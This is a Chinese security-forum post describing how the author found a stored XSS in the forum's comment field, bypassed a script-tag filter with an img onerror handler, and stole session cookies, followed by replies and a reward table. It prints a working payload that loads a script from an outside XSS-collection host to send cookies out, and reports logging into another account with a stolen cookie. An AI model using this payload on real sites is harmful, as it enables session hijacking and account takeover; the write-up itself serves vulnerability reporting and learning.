论坛xss利用打到cookie

空白丶   ·   发表于 2021-06-25 16:02:08   ·   漏洞文章

1.首先在评论区随表输入内容,发表然后抓包。

发现content_html参数

解码看了一下是

直接发表看一下源代码。

这里能大胆猜一下,这里的传参可能是我们最后发表的内容。
把传参的content_html该成<h1>44444</h1>的编码试试

猜想没有错,最后直接变成内容了

试试srcipt会不会被过滤

很明显被过滤了。

当然要获取cookie不是只有srcipt才行。试试img喃

可以看到并没有被过滤

编辑节点看一下大于号和小于号有没有被编码

并没有编码,但是加了一个属性。百度了一下。

没有很明白,大概意思就是不发送消息,我是这样理解的。看能不能把这个属性过滤掉。
这里我想了很多办法试了很多还是没有过滤掉。

最后我发现的突破口是这样的,没有带<>的srcipt是不会被过滤的。

于是我想到了用img的onerror属性去创建一个srcipt,然后把创建出来的srcipt加到body子节点。然在去发送src

最后的xss为: <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss.pt/vsTA';>

然后发表评论试试。

看一下xss平台有没有打到cookie

成功打到了cookie,但是不知道是不是只能打自己的。换一下账号测试一下。

换了一个账号查看评论

上xss看一下,成功打到了。

赶紧退出去,用cookie试一下能不能上号。

利用cookie成功上号

用户名金币积分时间理由
kbxiaohao 1.83 0 2021-07-25 03:03:10 一个受益终生的帖子~~
kbxiaohao 1.00 0 2021-07-25 03:03:09 一个受益终生的帖子~~
kbxiaohao 1.00 0 2021-07-25 03:03:00 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:39 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:42 一个受益终生的帖子~~
kbxiaohao 1.00 0 2021-07-25 03:03:58 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:34 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:07 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:45 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:40 一个受益终生的帖子~~
kbxiaohao 0.01 0 2021-07-25 03:03:57 一个受益终生的帖子~~
空白丶 0.10 0 2021-07-25 03:03:48 一个受益终生的帖子~~
奖励系统 100.00 0 2021-07-02 15:03:59 投稿满 10 赞奖励
奖励系统 50.00 0 2021-06-27 12:12:20 投稿满 5 赞奖励
1399546819 5.00 0 2021-06-27 12:12:58 一个受益终生的帖子~~
伐谋 5.00 0 2021-06-27 02:02:23 一个受益终生的帖子~~
念旧 1.00 0 2021-06-26 20:08:46 一个受益终生的帖子~~
清河逸尘 1.00 0 2021-06-26 20:08:56 膜拜+1
念旧 5.00 0 2021-06-26 20:08:55 一个受益终生的帖子~~
Track-聂风 2888.00 0 2021-06-26 18:06:11 学院漏洞,特殊奖励

打赏我,让我更有动力~

21 条回复   |  直到 2021-9-10 | 4388 次浏览

dienamer
发表于 2021-6-26

66666

评论列表

  • 加载数据中...

编写评论内容

伐谋
发表于 2021-6-27

牛啊

评论列表

  • 加载数据中...

编写评论内容

lunnam
发表于 2021-6-27

牛!
另外,这个refer属性我理解是:在社区点击任意外网链接,不把社区的url信息带出去

评论列表

  • 加载数据中...

编写评论内容

1399546819
发表于 2021-6-27

评论列表

  • 加载数据中...

编写评论内容

1399546819
发表于 2021-6-27

评论列表

  • 加载数据中...

编写评论内容

1399546819
发表于 2021-6-27

alert`1`

评论列表

  • 加载数据中...

编写评论内容

wzh
发表于 2021-6-27

厉害!

评论列表

  • 加载数据中...

编写评论内容

869858718
发表于 2021-6-28

哈哈哈哈,聂风的被黑了

评论列表

  • 加载数据中...

编写评论内容

1697571223
发表于 2021-6-29

学到了,学到了

评论列表

  • 加载数据中...

编写评论内容

范小东
发表于 2021-6-29

由此看来,xss是需要前端知识支持的

评论列表

  • 加载数据中...

编写评论内容

marx
发表于 2021-6-30

牛牛牛

评论列表

  • 加载数据中...

编写评论内容

空白丶
发表于 2021-8-30

111

评论列表

  • 加载数据中...

编写评论内容

asd999
发表于 2021-9-1

4444444

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

444

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

<zkaq>zkaq

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

<jiuzkaq>jiuzkaq

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

‘)你好

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

zkaq

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

"zkaq

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-8

'zkaq

评论列表

  • 加载数据中...

编写评论内容
1 2 / 2 跳转 尾页
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.